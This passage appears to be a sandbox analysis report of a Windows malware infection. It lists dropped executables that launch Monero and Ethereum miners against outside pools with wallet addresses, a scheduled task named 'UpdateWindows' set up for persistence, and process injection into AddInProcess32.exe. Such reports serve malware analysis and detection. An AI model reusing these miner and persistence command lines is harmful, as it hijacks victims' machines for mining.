                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:2480
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                            2⤵
                                                                                            • Checks processor information in registry
                                                                                            • Modifies data under HKEY_USERS
                                                                                            PID:3156
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                            2⤵
                                                                                            • Drops file in System32 directory
                                                                                            • Checks processor information in registry
                                                                                            • Modifies data under HKEY_USERS
                                                                                            • Modifies registry class
                                                                                            PID:4736
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                          1⤵
                                                                                          • Drops file in Windows directory
                                                                                          • Modifies Internet Explorer settings
                                                                                          • Modifies registry class
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:4132
                                                                                        • C:\Windows\system32\browser_broker.exe
                                                                                          C:\Windows\system32\browser_broker.exe -Embedding
                                                                                          1⤵
                                                                                          • Modifies Internet Explorer settings
                                                                                          PID:4700
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                          1⤵
                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:6088
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                          1⤵
                                                                                          • Modifies Internet Explorer settings
                                                                                          • Modifies registry class
                                                                                          PID:4184
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                          1⤵
                                                                                          • Modifies registry class
                                                                                          PID:4572
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                          1⤵
                                                                                          • Modifies registry class
                                                                                          PID:5328
                                                                                        • C:\Windows\system32\msiexec.exe
                                                                                          C:\Windows\system32\msiexec.exe /V
                                                                                          1⤵
                                                                                          • Enumerates connected drives
                                                                                          • Drops file in Program Files directory
                                                                                          • Drops file in Windows directory
                                                                                          • Modifies data under HKEY_USERS
                                                                                          • Modifies registry class
                                                                                          PID:5240
                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding 996CCA4A8890F091FA72C49D15F3449C C
                                                                                            2⤵
                                                                                            • Loads dropped DLL
                                                                                            PID:5044
                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding 0EFEF3CA06BB27F07D54892A4BCEC5A6
                                                                                            2⤵
                                                                                            • Blocklisted process makes network request
                                                                                            • Loads dropped DLL
                                                                                            PID:6048
                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                              "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                              3⤵
                                                                                              • Kills process with taskkill
                                                                                              PID:6000
                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding 72FD57D39C48F7CC325A569F160B24A0 E Global\MSI0000
                                                                                            2⤵
                                                                                            • Loads dropped DLL
                                                                                            PID:6644
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                          1⤵
                                                                                          • Modifies registry class
                                                                                          PID:6844
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                          1⤵
                                                                                            PID:7048
                                                                                          • C:\Users\Admin\AppData\Local\Temp\B42E.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\B42E.exe
                                                                                            1⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of SetThreadContext
                                                                                            PID:6792
                                                                                            • C:\Users\Admin\AppData\Local\Temp\B42E.exe
                                                                                              "{path}"
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:6704
                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\svchost.exe
                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\svchost.exe"
                                                                                                3⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:6356
                                                                                                • C:\Users\Admin\AppData\Roaming\WinHost\svchost.exe
                                                                                                  "{path}"
                                                                                                  4⤵
                                                                                                    PID:5524
                                                                                                  • C:\Users\Admin\AppData\Roaming\WinHost\svchost.exe
                                                                                                    "{path}"
                                                                                                    4⤵
                                                                                                      PID:7024
                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\kernel.exe
                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\kernel.exe" -o pool.minexmr.com:4444 -u 49sjJJDaUPKiSdVsdUR1R51v1ovWXrAZw3QYEDay7qVt3gqxju2anikWRWkZ8ymFfzUyCvw27WP8WV7QvdYVSSrJH26nsXa -p x --max-cpu-usage 40
                                                                                                        5⤵
                                                                                                          PID:6800
                                                                                                        • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                          "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                          5⤵
                                                                                                            PID:1408
                                                                                                          • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                            "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                            5⤵
                                                                                                              PID:6696
                                                                                                            • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                              "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                              5⤵
                                                                                                                PID:6864
                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                5⤵
                                                                                                                  PID:5352
                                                                                                                • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                  "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                  5⤵
                                                                                                                    PID:6484
                                                                                                                  • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                    "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                    5⤵
                                                                                                                      PID:4220
                                                                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                      5⤵
                                                                                                                        PID:5384
                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                        5⤵
                                                                                                                          PID:6472
                                                                                                                        • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                          "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                          5⤵
                                                                                                                            PID:6940
                                                                                                                          • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                            "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                            5⤵
                                                                                                                              PID:4840
                                                                                                                            • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                              "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                              5⤵
                                                                                                                                PID:6160
                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                5⤵
                                                                                                                                  PID:6204
                                                                                                                                • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                  "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                  5⤵
                                                                                                                                    PID:1696
                                                                                                                                  • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                    "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                    5⤵
                                                                                                                                      PID:6948
                                                                                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                      5⤵
                                                                                                                                        PID:3172
                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                        5⤵
                                                                                                                                          PID:800
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                          "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                          5⤵
                                                                                                                                            PID:4720
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                            "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                            5⤵
                                                                                                                                              PID:6708
                                                                                                                                            • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                              "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                              5⤵
                                                                                                                                                PID:5692
                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                5⤵
                                                                                                                                                  PID:6504
                                                                                                                                                • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                  5⤵
                                                                                                                                                    PID:5632
                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                    5⤵
                                                                                                                                                      PID:4612
                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                      5⤵
                                                                                                                                                        PID:2572
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                        5⤵
                                                                                                                                                          PID:6728
                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                          5⤵
                                                                                                                                                            PID:3180
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                            5⤵
                                                                                                                                                              PID:5956
                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                              5⤵
                                                                                                                                                                PID:7076
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                5⤵
                                                                                                                                                                  PID:7004
                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:896
                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:6240
                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                      5⤵
                                                                                                                                                                        PID:5688
                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:7064
                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                          5⤵
                                                                                                                                                                            PID:2416
                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                            5⤵
                                                                                                                                                                              PID:6848
                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                              5⤵
                                                                                                                                                                                PID:6896
                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                5⤵
                                                                                                                                                                                  PID:6452
                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                  5⤵
                                                                                                                                                                                    PID:6804
                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                    5⤵
                                                                                                                                                                                      PID:5452
                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                  "schtasks.exe" /create /tn UpdateWindows /tr "C:\Users\Admin\AppData\Roaming\WinHost\svchost.exe" /st 05:25 /du 23:59 /sc daily /ri 1 /f
                                                                                                                                                                                  3⤵
                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                  PID:6952
                                                                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                              c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:2124
                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:5264
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\B94F.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\B94F.exe
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                  PID:1300
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\C288.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\C288.exe
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                  PID:4892
                                                                                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                    C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:6004
                                                                                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                      C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:4624
                                                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:5352
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\CC1E.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\CC1E.exe
                                                                                                                                                                                        1⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        PID:4896
                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 736
                                                                                                                                                                                          2⤵
                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                          • Program crash
                                                                                                                                                                                          PID:4652
                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 752
                                                                                                                                                                                          2⤵
                                                                                                                                                                                          • Program crash
                                                                                                                                                                                          PID:4188
                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 756
                                                                                                                                                                                          2⤵
                                                                                                                                                                                          • Program crash
                                                                                                                                                                                          PID:4064
                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 884
                                                                                                                                                                                          2⤵
                                                                                                                                                                                          • Program crash
                                                                                                                                                                                          PID:6932
                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
